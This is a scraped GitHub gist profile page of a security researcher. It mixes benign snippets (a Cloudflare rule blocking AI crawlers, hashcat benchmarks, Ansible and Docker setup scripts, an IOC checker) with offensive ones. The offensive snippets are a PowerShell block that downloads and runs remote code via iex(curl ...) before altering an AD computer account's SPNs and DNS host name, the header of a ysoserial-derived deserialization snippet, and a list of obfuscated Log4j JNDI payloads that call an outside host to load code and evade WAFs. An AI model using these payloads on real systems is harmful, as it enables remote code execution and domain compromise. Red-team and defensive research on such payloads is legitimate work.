Skip to content

Instantly share code, notes, and snippets.

View ZephrFish's full-sized avatar
🌐
Building tools and tradecraft to help red and blue

Andy | ZephrFish ZephrFish

🌐
Building tools and tradecraft to help red and blue
View GitHub Profile
@ZephrFish
ZephrFish / cloudflareai.expression
Created May 31, 2025 11:30
CloudFlare block AI crawlers
(http.user_agent contains "GPTBot") or (http.user_agent contains "ChatGPT-User") or (http.user_agent contains "ClaudeBot") or (http.user_agent contains "PerplexityBot") or (http.user_agent contains "cohere-ai") or (http.user_agent contains "CCBot") or (http.user_agent contains "Anthropic-AI") or (http.user_agent contains "Bytespider") or (http.user_agent contains "Applebot") or (http.user_agent contains "Diffbot") or (http.user_agent contains "YandexGPT") or (http.user_agent contains "GigaChat") or (http.user_agent contains "Manus") or (http.user_agent contains "Devin") or (starts_with(http.user_agent, "Operator")) or (starts_with(http.user_agent, "Gemini"))
Benchmark is from an AI Cloud Rig:
https://cloud.vast.ai/?ref_id=127244
hashcat (v6.2.6-851-g6716447df) starting in benchmark mode
CUDA API (CUDA 12.8)
====================
* Device #1: NVIDIA GeForce RTX 5090, 31610/32120 MB, 170MCU
* Device #2: NVIDIA GeForce RTX 5090, 31610/32120 MB, 170MCU
* Device #3: NVIDIA GeForce RTX 5090, 31610/32120 MB, 170MCU
@ZephrFish
ZephrFish / TaskbarAndSoftware.yml
Last active June 15, 2024 21:56
Ansible for configuring windows taskbar and basic setup
---
- name: Configure Windows Taskbar and Install Software
hosts: windows
tasks:
- name: Hide the search box on the taskbar
win_regedit:
path: HKCU:\Software\Microsoft\Windows\CurrentVersion\Search
name: SearchboxTaskbarMode
data: 0
type: dword
@ZephrFish
ZephrFish / DockerSetupUbunut.sh
Created June 2, 2024 11:23
DockerSetupNix.sh
for pkg in docker.io docker-doc docker-compose docker-compose-v2 podman-docker containerd runc; do sudo apt-get remove $pkg; done
# Add Docker's official GPG key:
sudo apt-get update
sudo apt-get install ca-certificates curl -y
sudo install -m 0755 -d /etc/apt/keyrings
sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg -o /etc/apt/keyrings/docker.asc
sudo chmod a+r /etc/apt/keyrings/docker.asc
# Add the repository to Apt sources:
@ZephrFish
ZephrFish / 14_RTX_4090_v6.2.6.Benchmark.txt
Last active May 20, 2025 20:18
Hashcat v6.2.6 benchmark on 14x Nvidia RTX 4090
Benchmark is from an AI Cloud Rig:
https://cloud.vast.ai/?ref_id=127244
hashcat (v6.2.6) starting in benchmark mode
Benchmarking uses hand-optimized kernel code by default.
You can use it in your cracking session by setting the -O option.
Note: Using optimized kernel code limits the maximum supported password length.
To disable the optimized kernel code in benchmark mode, use the -w option.
//All credit goes to Ysoserial.net and the great @tiraniddo
//Snippets copied from ysoserial.net
//https://thewover.github.io/Mixed-Assemblies/ - Great read!
//https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui - Another great read
using System;
using System.Collections.Generic;
using System.Runtime.Serialization.Formatters.Binary;
using System.IO;
using System.Reflection;
iex(curl https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1 -UseBasicParsing )
Import-ActiveDirectory
Set-ADComputer WIN-JQTB1UHHF2S -ServicePrincipalNames @{REPLACE="HOST/WIN-JQTB1UHHF2S","RestrictedKrbHost/WIN-JQTB1UHHF2S"} -Verbose
#in my testing i had to set dnshostname to $null first
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName $null
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName dc1.batcave.local
@ZephrFish
ZephrFish / Log4j Payloads
Last active December 20, 2022 19:32
Collection of WAF evasion payloads
${jndi:ldap://127.0.0.1:1389/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
@ZephrFish
ZephrFish / IOC-Checker.ps1
Last active February 3, 2021 10:10
Threat Analysis Group IOC Scanner
# Checks the registry for IOCs from https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/
# If not vulnerable should return "ERROR: The system was unable to find the specified registry key or value."
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverConfig"
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SSL Update"
# Checks the paths of IOCs from https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/
# If not vulnerable each will return false
Test-Path C:\Windows\System32\Nwsapagent.sys
Test-Path C:\Windows\System32\helpsvc.sys
-7n
-9s
-er7kj
-gn
-jc5pe
-jlowd
-ka25u
-lxwg8exljmcqy
-wwgi2xnl
-xhi7z